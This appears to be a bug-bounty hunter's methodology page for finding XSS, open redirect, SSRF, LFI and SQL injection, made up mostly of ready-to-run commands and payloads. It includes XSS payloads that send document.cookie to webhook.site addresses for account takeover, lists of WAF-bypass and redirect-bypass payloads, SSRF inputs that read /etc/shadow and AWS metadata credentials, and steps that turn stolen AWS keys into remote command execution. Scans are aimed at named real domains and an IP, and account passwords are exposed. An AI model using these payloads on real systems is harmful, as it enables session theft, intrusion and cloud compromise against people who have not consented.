🇵🇰XSS & Open Redirect

Find Wild card Scope like: *.target.com
Set domain scope(burpsuite).*.target.com$
Run subdomain.sh Script
Find All Swagger API for DOM XSS
Run DOM-fear.sh Script

🔥 Perfect regex to Endpoints Analysis

(
figlet -f small -c "UUIDs" | lolcat; grep -Eo '[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[1-5][0-9a-fA-F]{3}-[89abAB][0-9a-fA-F]{3}-[0-9a-fA-F]{12}' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total UUIDs: "$1}');
figlet -f small -c "JWT" | lolcat; grep -a "eyJ" wayback.txt | grep -Eo 'eyJ[A-Za-z0-9_\-\.]+' | sort -u | tee >(wc -l | awk '{print "Total JWTs: "$1}');
figlet -f small -c "Suspicious Strings" | lolcat; grep -Eo '([a-zA-Z0-9_-]{20,})' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Suspicious: "$1}');
figlet -f small -c "Credit Cards" | lolcat; grep -Eo '\b[0-9]{13,16}\b' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total CCs: "$1}');
figlet -f small -c "SessionIDs" | lolcat; grep -Eo '[a-zA-Z0-9]{32,}' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total SessionIDs: "$1}');
figlet -f small -c "Tokens & Secrets" | lolcat; grep -aiE 'token=|token |code=|code |secret=|secret ' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Tokens/Secrets: "$1}');
figlet -f small -c "Credentials" | lolcat; grep -aiE 'admin|pass(word|wd|wd=)|pwd|passwd|password|mail|phone|mobile|number' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Cred-like: "$1}');
figlet -f small -c "Private IPs" | lolcat; grep -Eo '((10|172\.(1[6-9]|2[0-9]|3[0-1])|192\.168)\.[0-9]{1,3}\.[0-9]{1,3})' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Private IPs: "$1}');
figlet -f small -c "All IPs" | lolcat; grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' wayback_domain.com.txt | sort -u | tee >(wc -l | awk '{print "Total IPs: "$1}');
figlet -f small -c "Payments" | lolcat; grep -aiE 'payment|order(id)?|pay(id)?|invoice|receipt' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Payments: "$1}');
figlet -f small -c "Roles" | lolcat; grep -aiE 'role=|privilege=|=admin' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Roles: "$1}');
figlet -f small -c "API Endpoints" | lolcat; grep -aiE '/api/|api\.|/graphql|graphql' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total API Endpoints: "$1}');
figlet -f small -c "Auth Stuff" | lolcat; grep -aiE 'sso|/sso|saml|/saml|oauth|/oauth|auth|/auth|callback|/callback' wayback.txt | sort -u | tee >(wc -l | awk '{print "Total Auth: "$1}');
f
)

Subdomains Gathering

domain=naturalis.nl; figlet -f small -c "Passive: Subfinder" | lolcat; subfinder -d $domain -all -recursive -t 200 -o subfinder.txt; figlet -f small -c "Passive: Assetfinder" | lolcat; assetfinder --subs-only $domain | tee assetfinder.txt; figlet -f small -c "Passive: Findomain" | lolcat; findomain --quiet -t $domain -u findomain.txt; figlet -f small -c "Passive: Web Archive" | lolcat; curl -s "https://web.archive.org/cdx/search/cdx?url=*.$domain&fl=original&collapse=urlkey" | awk -F/ '{print $3}' | sort -u | tee archive.txt; figlet -f small -c "Passive: crt.sh" | lolcat; curl -s "https://crt.sh/?q=%25.$domain&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee crt.txt ; figlet -f small -c "Active: Knockpy" | lolcat; knockpy -d $domain --recon --bruteforce | grep -oP 'https?://[a-zA-Z0-9.-]+(:[0-9]+)?' | tee knockpy.txt; figlet -f small -c "Sorting Subdomains" | lolcat; cat knockpy.txt crt.txt archive.txt assetfinder.txt subfinder.txt findomain.txt | sort -u | tee subdomains.txt; figlet -f small -c "Probing Live Subs" | lolcat; cat subdomains.txt | httpx-toolkit -ports 80,443,8080,8000,8888,8881,8889 -threads 200 | tee livesubdomains.txt; sed -i 's/:[0-9]\+//g' livesubdomains.txt; echo -e "\nLive Subdomains Count: $(cat livesubdomains.txt | wc -l)" | lolcat

curl -X GET http://50.116.35.69:86/index.js | grep -i -E "aws_access_key|aws_secret_key|api key|passwd|pwd|heroku|slack|firebase|swagger|aws_secret_key|aws key|password|ftp password|jdbc|db|sql|secret jet|config|admin|pwd|json|gcp|htaccess|.env|ssh key|.git|access key|secret token|oauth_token|oauth_token_secret|pass|passphrase|credentials|encryptKey|appKey|token|secret|Authorization|Key|private"

site:.worldremit.com intext:"Swagger UI" | intitle:"Swagger UI"
?url=https://jumpy-floor.surge.sh/test.yaml
https://xss.smarpo.com/test.json
https://jumpy-floor.surge.sh/test.json
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
data:text/html;base64,ewoidXJsIjogImh0dHBzOi8vdGVhcmZ1bC1lYXJ0aC5zdXJnZS5zaC90ZXN0LnlhbWwiLAp9
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/rlogin.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/ylogin.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/lw.json
https://raw.githubusercontent.com/0xAshura/R-Payloads-101/refs/heads/main/SwaggerUI/rtest0.json

Find PII Data Sensitive & Information Disclosure

wget -O data.txt "https://web.archive.org/cdx/search/cdx?url=*.udayton.edu/*&output=text&fl=original&collapse=urlkey&from="

cat data.txt | grep -E '\.xls|\.xlsx|\.json|\.sql|\.doc|\.docx|\.pptx|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.git|\.env|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc|\.conf|\..htaccess|\.htpasswd|\.pfx|\.p12|\.swp\.old|\.temp|\.dump|\.passwd|\.shadow|\.git|\.svn|\.DS_Store|\.idea|\.vscode|\.bash_history|\.zsh_history'

cat data.txt  | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon

Find 403Hidden Treasures: 403 forbbiden Bypass with 4-ZERO-3

dirsearch -l subdomains_output/403_sub.txt --exclude-status=403 -w 403-ultimate-discovery.txt

bash 403-bypass.sh -u https://target.com/secret --encode
bash 403-bypass.sh -u https://target.com/secret --header
bash 403-bypass.sh -u https://target.com/secret --protocol
bash 403-bypass.sh -u https://target.com/secret --HTTPmethod

Find 404404 Not Found Subdomains have Hidden Endpoint and Files

dirsearch -l subdomains_output/404_sub.txt --exclude-status=404 -w 404-ultimate-discovery.txt

Find Data Exposure
Run js-fear.sh Script with js.txt

curl -X GET http://50.116.35.69:86/index.js | grep -i -E 'password|pwd|pass|passphrase|credentials|encryptKey|appKey|token|secret|Authorization|Key|private'

FindCVE PATH Disclosure

cat data.txt | grep "secure" | grep "jspa" && cat data.txt | grep '/geoserver/ows/' && cat data.txt | grep ganglia  && cat data.txt | grep graph_all_periods.php && cat data.txt | grep "keycloak" && cat data.txt | grep "/realms/master" && cat data.txt | grep '?id='

Find AllRegister and signup Foams for Open Redirect to Stealing User Session token

Open redirects in the login flow mostly have the session token or any other auth token in the query param.

site:.dv.ue.edu.pk inurl:login | intext:login | intitle:login | inurl:signin | inurl:admin | inurl:dashboard
site:.ue.edu.pk inurl:admin | inurl:dashboard | inurl:register | inurl:login | intitle:register | inurl:signup | intitle:signup | intext:signin | intext:login | intext:signup

Find theHtml Injection in email via Name field while signup Process

'"/><img src=x><a href=https://evil.com>Click
<b>hello</b><h1>hacker</h1><a href=https://evil.com>hacked
<img src="https://static.wikia.nocookie.net/mrbean/images/4/4b/Mr_beans_holiday_ver2.jpg">
<h1>Congratulations you won the cash prize </h1><img src="https://play-lh.googleusercontent.com/ufXzlOQA6bwOibqQ_yBmIFaqBWOl3bbgeffwPV8z3419PWPvHZfx4Vxe98GgQ8Z7mVQ"><a href="https://evil.com"><H1><U><I>Click here to claim your reward

Find thePersistent XSS in the Signup Process

in the name field: /"><img src=x onerror=alert(document.cookie)> in the name field.

Credentials

hunter2-ywh-f6a5371da6033e99@yeswehack.ninja
swag@bugcrowdninja.com
Python@123

Find theOpen Redirect in these components:
Sign in & register pages
Sign out endpoint
Email verification links
Profile account page
Password resets (inspect the generated token link too as it may contain a redirect parameter)

server-side redirects always use Location response header with 3XX status code If missing Location response header but still redirects (after a small delay), it DOM-based redirect

Run open-dork.sh Script

Check Server and client side redirect then Exploit Further

check Location Header

curl -I "https://opac.nust.edu.pk/cgi-bin/koha/tracklinks.pl?uri=https%3A%2F%2Fwww.elsevier.com%2Fbooks-and-journals%2Fbook-companion%2F9780128038437&biblionumber=591873"
curl -IL "http://www.paulsellers.nl/guestbook/go.php?url=https://docs.ultralytics.com/modes/predict/"
curl "https://account.cbg.nl/logout?redirect_uri=https://evil.com/" | grep -i -E 'location.href|window.location|window.location.href'

iflocation.href window.location window.location.href in DOMthen Check Open Redirect to XSS

javascript:alert(origin)
javascript:alert/**/(origin)
javascript:confirm(origin);//

Open Redirect DOM XSS toAccount Take Over

javascript:document.location=%27https://webhook.site/fd59355e-845b-4462-894a-c6809633adab/%27%2bdocument.cookie

Find XSS Steps

Extract URLs from Text - Extract HTML Links - Online - Browserling Web Developer Toolswww.browserling.com

1:FistFind tech based Subdomains withhttpx or Shodan or Google Dork like: PHP

Check Subdomains.sh to tech based Filters Domains
Check Ext-dork to tech based Filters Domains
Check Shodan-dork to tech based Filters Domains

2:ThenFind how many Subdomain used endpoint-extentionswith Google Dork or Wayback machine or roborts.txt or Fuzzing like PHP tech used endpoint-extensions: php,htm,html
Sort out AllSubdomain to used endpoint-extentionsand check one by one

Run ext-dork.sh Script with Specific Domain

dirsearch -w raft-medium-directories.txt -u https://xyz.example.com -e js,php,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl --full-url --max-rate=5 -i 200

feroxbuster -s 200 -k --random-agent --no-state --dont-extract-links -r -W 0 -x js,php,phtml,inc,html,xhtm,htm,htn,asp,aspx,ashx,asmx,cfm,jsp,jspx,jsf,jspa,do,action,act,pl -w raft-small-directories.txt -u https://www.kfc.co.uk/  -t 10 --rate-limit 5

ffuf -u https://www.kfc.co.uk/FUZZ -w common.txt -recursion -recursion-depth 4 -mc 200 -e .js,.php,.html,.xhtm,.htm,.htn,.asp,.aspx,.ashx,.asmx,.cfm,.jsp,.jspx,.jsf,.jspa,.do,.action,.act,.pl -rate 50 -t 50

API Fuzzing

ffuf -w api-wordlist.txt -u https://target.com/API/v3/FUZZ -mc 200 -H "Content-Type: application/json"

Check Hidden Paths inroborts.txt

httpx-toolkit -l livesubdomains.txt -paths /robots.txt -silent -o robots-url.txt && for url in $(cat robots-url.txt);do http -b $url | grep 'Disallow' | awk -F ' ' '{print $2}' | cut -c 2- | anew robot-words.txt;done

ffuf -u FUZZ/robots.txt -w livesubdomains.txt -mr "/INTERSHOP/"

3:ThenFind origin IPusing shodan,fofa For Endpoint BF and WafBypass

Run hostname:"mytoken.us.dell.com" Shodan
Run host:"mytoken.us.dell.com" Fofa
nslookup mytoken.us.dell.com

4:ThenFind vulnerable Endpointsof Both Domain and origin IP according to tech and endpoint-extention: with Fuzzing used ffuf or Dirsearsh like error.php, demo.html, test.htm

Run Fuzzing with FFUF
Run Fuzzing with Gobuster
Run Fuzzing with Dirsearch

5:Then find the vulnerable Parameterswith Arjun or x8like error.php?code=xss

Run Arjun
Run ParamPamPam
Run x8 with parameters wordlist

6:Then confirm html injection

arjun -i endpoint.txt -oT Arjun.txt && cat Arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee xss-check.txt && cat xss-check.txt | Gxss | httpx -sc && cat xss-check.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee -a confirm-html-injection.txt

7:Then confirm Reflected XSS

cat xss-check.txt | Gxss -p '">asad<hacked' | tee -a confirm-xss.txt

8:Find XSS Vulnerable Endpoint in other Subdomains

cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc

9:Reflected XSS toAccount Take Over

https://xss.report/dashboard swagpk Synack@3434
https://bxsshunter.com/dashboard Synack@3434

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

10:Then confirmSQL injection

while read url; do
    echo "Testing URL: $url"
    yes n | ghauri -u "$url" --dbs --banner --current-db --level 3
done < arjun.txt

ghauri -u https://ugadmissions.neduet.edu.pk/admissions/user_login.jsp?id=1 --random-agent -v3 --level=3 risk=3

11:Then confirmOpen Redirect

cat xss-check.txt | qsreplace 'https://%09/evil.com' | httpx -status-code -title -location

cat xss-check.txt | sed 's/=.*/=/' | httpx-toolkit -paths op.txt -threads 50 -random-agent -sc -location

12:Then confirm Local file inclusion (LFI)

echo "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /home/kali/target/wordlists/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"

echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /home/kali/target/wordlists/lfi.txt -c -mr "root:" -v; done

---------------------------------------------------------------------

echo 'https://be.elementor.com/visit/?bta=13693&brand=elementor&landingPage=' | httpx -paths op.txt -threads 50 -random-agent -sc -location

URL Decode and Encode - OnlineURL Decode

URL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy

Open Redirect Cheat SheetPentester Land

Bypass via encoding

https://evil.com
https://%09/evil.com
http%3A%2F%2Fwww.google.com
https%3A%2F%2Fwww.google.com%2F
https://www%2Egoogle%2Ecom
https://www%252Egoogle%252Ecom
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
%68%74%74%70%3a%2f%2fevil.com
/%0D/evil%25%32%65com
%40evil.com/
%2F%2Fevil.com
%2F%2F%2F%2Fhackerone.com

Bypass filter

//evil.com
///evil.com/
////evil.com
/%0d/evil.com
/%09/evil.com
/%0A/evil.com
/%0D/evil.com
/%09/evil.com
/+/evil.com
/\evil.com/
\\evil.com\
/..//evil.com
http:///evil.com/
@www.bing.com
.evil.com
https:evil.com
https;evil.com
https:\/\/evil.com
https:/\/\evil.com
https:\\evil.com

Bypass whitelist

target.com%40evil.com
https://target.com%5C%5C@google.com/
https://evil.com%5C%40www.example.com
https://target.com@evil.com/
https://target.com/@evil.com
https://evil.com\@target.com
https://target.com.bing.com/
https://target.com?bing.com
https://target.com°bing.com
https://target.com%23bing.com
https://target.com%00bing.com
https://target.com%0Abing.com
https://target.com%0Dbing.com
https://target.com%0Dbing.com
https://target.com%09bing.com
/%0d/evil.com/
https://evil.com\\.target.com/
https://evil.com%E3%80%82%23.target.com/
https://target.com%00https://evil.com/
https://website.com/http://evil.com/
http://evil.com?vimeocdn.com/
https://attacker.com%E3%80%82example.com   
?link=https://bing.com?link=https://www.target.com/
?link=https://evil.com/?link=https://open.spreaker.com//https://evil.com
?Redirect=https:/www.target.com/login-redirect/?redirect=//any-domain.com

OAuth to Open-Redirect

https://auth.<company>/?next_url=https://www.<product>/login-redirect/?redirect=//any-domain.com?token=<TOKEN>
https://www.facebook.com/v2.8/dialog/oauth?app_id=xxxx&client_id=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=en_US&origin=1&redirect_uri=xxxxx/login?next_action=//attacker.com&response_type=token&scope=public_profile%2Cemail&sdk=joey&version=v2.8

DOM XSS Check In Redirect Parameters

My Payloads

javascript:confirm(1);//
java%0d%0ascript%0d%0a:alert(document.domain)
javascript://%250Dtop.confirm?.(origin)//
javascript:%250Aalert(1)//
javascript:@evil.com
java%0D%0Ascript%0D%0A:alert(document.domain)
javascript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
javascript:alert(1)
JavaScript:alert(1)
JAVASCRIPT:alert(1)
jav%0Aascri%0Apt:alert(1)
jav%0Dascri%0Dpt:alert(1)
jav%09ascri%09pt:alert(1)
%19javascript:alert(1)
javascript://%0Aalert(1)
javascript://%0Dalert(1)
javascript://https://example.com%0Aalert(1)

If Access token available In Redirect URL then Check Account take Over

j%09avascript:document.location=%27https://webhook.site/88322504-926e-477c-a16e-5c6ba6b24b7a/%27%2bdocument.cookie

OR Check with Burp Collaborater And Webhook URL

Webhook.site - Test, transform and automate Web requests and emailswebhook.site

SSRF Check In Redirect OR Data Fetch and File Download Parameters

wfuzz -z range,0-65535 -u 'https://www.somaiya.edu.in/download.php?pdf_path=127.0.0.1:FUZZ'

python3 ssrfmap.py -r request.txt -p "url" -m readfiles,portscan

http://[::]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254//latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role/
file:///etc/passwd
file:///etc/shadow
file:///etc/shells
file:///etc/group
file:///etc/profile
file:///etc/hosts
file:///proc/self/environ
file:///proc/self/status
file:///proc/mounts
file:///proc/version
file:///bin/sh
file:///C:/Windows/win.ini
file:///web.config
file:///C:/windows/System32/drivers/etc/hosts
cat /e*c/p*s*d

if SSRF then check to Reflected XSS

Example: https://mop4.com/?url=https://brutelogic.com.br/poc.svg

Payload URL

https://brutelogic.com.br/poc.svg

if SSRF then check to RCE

1) Configure AWS CLI

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_DEFAULT_REGION=us-west-1
export AWS_SESSION_TOKEN=

2) these Paths can be used to find the region
/latest/meta-data/placement/availability-zone
/latest/dynamic/instance-identity/document

3) aws sts get-caller-identity

4) aws s3 ls

5) aws ssm send-command --document-name "AWS-RunShellScript" --comment "AnyComment" --instance-ids="[Instance-id]" --parameters "commands=uname -a"

Blind XSS Check to Account take Over

Find Hidden Endpoints FOR Fuzzing

FUFF

recursion -recursion-depth 4
-rate 50 -t 50
-p 0.5-0.6 
-v -mc 200
-v -fc 401,403
-e .html,.htm
-e .php,.html,.htm
-e .asp,.aspx,.html,.htm
-e .jsp,.jspx,.do,.html,.htm,.action
-x "http://127.0.0.1:8080"
-s

Dirsearsh

--exclude-sizes 0B 
--recursive
--random-agent
--max-rate=
--full-url
--cookie=
-i 200
-x 401,403
-e html,htm
-e php,html,htm,js
-e asp,aspx,html,htm,js
-e jsp,jspx,do,html,htm,action,js
-e js,php,html,xhtml,htm,asp,aspx,ashx,asmx,cfm,jsp,jspx,do,action,pl

Find Hidden Parameters

python3 parampp.py -u https://press.zara.com/ECOMPressSite/error.html

cat arjun.txt | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | tee xss.txt && cat xss.txt | Gxss | httpx -sc && cat xss.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee -a confirm-xss.txt

cat x8.txt | awk -F' % ' '{baseUrl=$1; params=$2; split(params, paramArray, ", "); for(i=1; i<=length(paramArray); i++) {print baseUrl "?" paramArray[i] "="}}' | sed 's/^GET //' | tee xss.txt && cat xss.txt | Gxss | httpx -sc && cat xss.txt | Gxss -p '">asad<a href=https://bing.com>hacked' | tee -a confirm-xss.txt

Arjun

-c 500
-d 2
-t 10 -T 10
--stable 
--passive
-m POST
-oT arjun.txt
--disable-redirects 
--headers ‘Cookie: PHPSESSID=xxxx’

--reflected-only 
-X GET
-u 
-w
-v

Find XSS vulnerable Endpoint to check in other Subdomains

cat livesubdomains.txt | httpx -ports 80,443,8080,8443 -path /ECOMPressSite/error.html -mr "error" -sc

Confirm Vulnerable Parameter for Html injection OR Reflected XSS

"><a href=https://bing.com>hacked
'"><a href=https://bing.com>hacked<a href=https://bing.com>hacked
'"><marquee>Hacked_by_asad</marquee>
"><iframe width=500 height=500 src="https://evil.com"></iframe>
"-(alert)(origin)-"
'"><img src=x onerror=confirm(origin)>
"><svg onload=confirm(1)>
(confirm)(origin)
javascript:confirm(document.domain)
<"onmouseover=(confirm)(origin);"
"><a href=javascript:confirm(document.cookie)>ClickMe

XSS Payloads

### if Website Remove payloads Kaywords then used this Payloads:
<a/href=j&#97v&#97script&#x3A;&#97lert(origin)>ClickMe
"><a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
"><input type=hidden oncontentvisibilityautostatechange=alert() style=content-visibility:auto>

Akamai WAF Bypasses...

';k='e'%0Atop['al'+k+'rt'](1)//
'><A HRef=' AutoFocus OnFocus=top//?.['ale'%2B'rt'](1)>
---------------------
CloudFlare WAF Bypasses...
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ev'%2B'al'](`imp\u00%36%66rt\u00%32%38'//X55.is'\u00%32%39`)>

<svg/onload=window['al'+'ert']1337>
<Svg Only=1 OnLoad=confirm(document.cookie)>
<svg onload=alert&#0000000040document.cookie)>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1//On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Img Src=OnXSS OnError=prompt(1337)>
<Img Src=OnXSS OnError=prompt(document.cookie)>
<Svg Only=1 OnLoad=confirm(atob('Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=='))>
---------------------
Cloudfront WAF Bypasses...

%2522%253E%253Csvg/onload=alert(origin)%253E
'>'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/aabb/['al'%2b'ert'](document./aabb/location);//
'>%0D%0A%0D%0A<x '='foo'><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//>'>
---------------------
ModSecurity WAF Bypasses...

Payloads designed to evade ModSecurity WAF rules
<svg onload='new Function['Y000!'].find(al\u0065rt)'>
---------------------
Imperva WAF Bypasses...

Advanced techniques for bypassing Imperva WAF protection
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter='location=javas+cript:ale+rt%2+81%2+9;//</div'>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle='propmt(document.cookie);'>
---------------------
Sucuri WAF Bypasses...

<A HREF='https://www.cia.gov/'>Click Here </A>
'><img src=x onerror=alert(document.cookie)>
<button onClick='prompt(1337)'>Submit</button>
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(1337)>ClickMe
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe
<a href='j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://github.com/coffinxp';'>ClickMe</a>

Find Origin IP for Bypass WAF

hostname:".dell.com" http.component:php
hostname:".dell.com" http.component:java
hostname:".dell.com" http.component:ASP.NET

nslookup mytoken.us.dell.com

https://search.censys.io/
host="mytoken.us.dell.com"

https://en.fofa.info/
domain="mytoken.us.dell.com"

https://www.shodan.io/search
hostname:"mytoken.us.dell.com"

curl -i url | head -n 15

Create and Customize XSS Payload According WAF and Regex

Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security AcademyWebSecAcademy

JSFiddle - Code Playgroundjsfiddle.net

RXSS to Account Take Over

'"><img src="x" onerror="document.location='https://webhook.site/d5f5a3a4-0fd6-43af-8836-06cd4caf41fd?cookie='+document.cookie">
<img src=x onerror="document.location='https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie;">
"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

if GET Parameter Check for SQL injection

SQLMap Command Generatortaurusomar.github.io

SQLMap Command Generatoracorzo1983.github.io

PreviousPage 3 NextAdmin Panel

Last updated 1 month ago

hashtag🔥 Perfect regex to Endpoints Analysis

hashtagSubdomains Gathering

hashtagCheck Server and client side redirect then Exploit Further

hashtagFind XSS Steps

hashtag---------------------------------------------------------------------

hashtagOpen Redirect GET-Based in Register-Login-logout-signup and Reset-Password Page URL

hashtagDOM XSS Check In Redirect Parameters

hashtagIf Access token available In Redirect URL then Check Account take Over

hashtagOR Check with Burp Collaborater And Webhook URL

hashtagSSRF Check In Redirect OR Data Fetch and File Download Parameters

hashtagif SSRF then check to Reflected XSS

hashtagif SSRF then check to RCE

hashtagBlind XSS Check to Account take Over

hashtagFind Hidden Endpoints FOR Fuzzing

hashtagFind Hidden Parameters

hashtagFind XSS vulnerable Endpoint to check in other Subdomains

hashtagConfirm Vulnerable Parameter for Html injection OR Reflected XSS

hashtagFind Origin IP for Bypass WAF

hashtagCreate and Customize XSS Payload According WAF and Regex

hashtagRXSS to Account Take Over

hashtagif GET Parameter Check for SQL injection